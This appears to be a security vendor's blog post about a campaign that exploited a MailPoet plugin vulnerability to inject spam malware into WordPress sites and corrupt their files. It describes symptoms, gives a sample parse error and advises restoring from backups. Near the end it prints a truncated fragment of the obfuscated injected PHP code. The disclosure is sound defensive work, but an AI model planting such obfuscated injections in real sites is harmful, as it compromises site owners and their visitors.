Update: We identified the root cause: MailPoet Vulnerability Exploited in the Wild – Breaking Thousands of WordPress Sites.
The last few days has brought about a massive influx of broken WordPress websites. What makes it so unique is that the malicious payload is being blindly injected which is causing websites to break. While we’re still researching, we do want to share share some observations:
- This infection is aimed at websites built on the popular WordPress CMS.
- It is targeting sites with outdated (vulnerable) plugins or weak admin passwords.
- Malware is highly obfuscated and attempts to inject SPAM to the hacked website.
There is, however, one very unpleasant impact of this infection. The infector PHP code is buggy and corrupting legitimate website files. It is targeting not only the core WordPress files, but also theme and plugins files. The results are various PHP errors being displayed instead of the normal site content. If you see this error on your site…
Parse error: syntax error, unexpected ‘)’ in /home/user/public_html/site/wp-config.php on line 91
… it means your site is likely hacked. Our sitecheck scanner will warn of this error as well:
The only known solution (after removal of injected malware)is restoring these corrupted files from a clean backup. If you are curious about the malware injection, this is what it looks like (it is randomly generated):
<?php $pblquldqei = ‘5c%x7824-%x5c%x7824*!|!%x5c%x7824-%x5c%x7824%x5c%x785c%x5c%x7825j^%xq%x5c%x7825%x5c%x7827Y%x5c%x78256<.msv%x5c%x7860ftsbqA7>q7825)3of:opjudovg<~%x5c%x7824<!%x5c%x7825o:!>!%x5c%x782421787825!|!*!***b%x5c%x7825)…
We’ll continue the investigation and will provide more details as they become available. If you suspect you have been impacted by this infection rest assured that our team is ready and actively cleaning this mess up on all websites.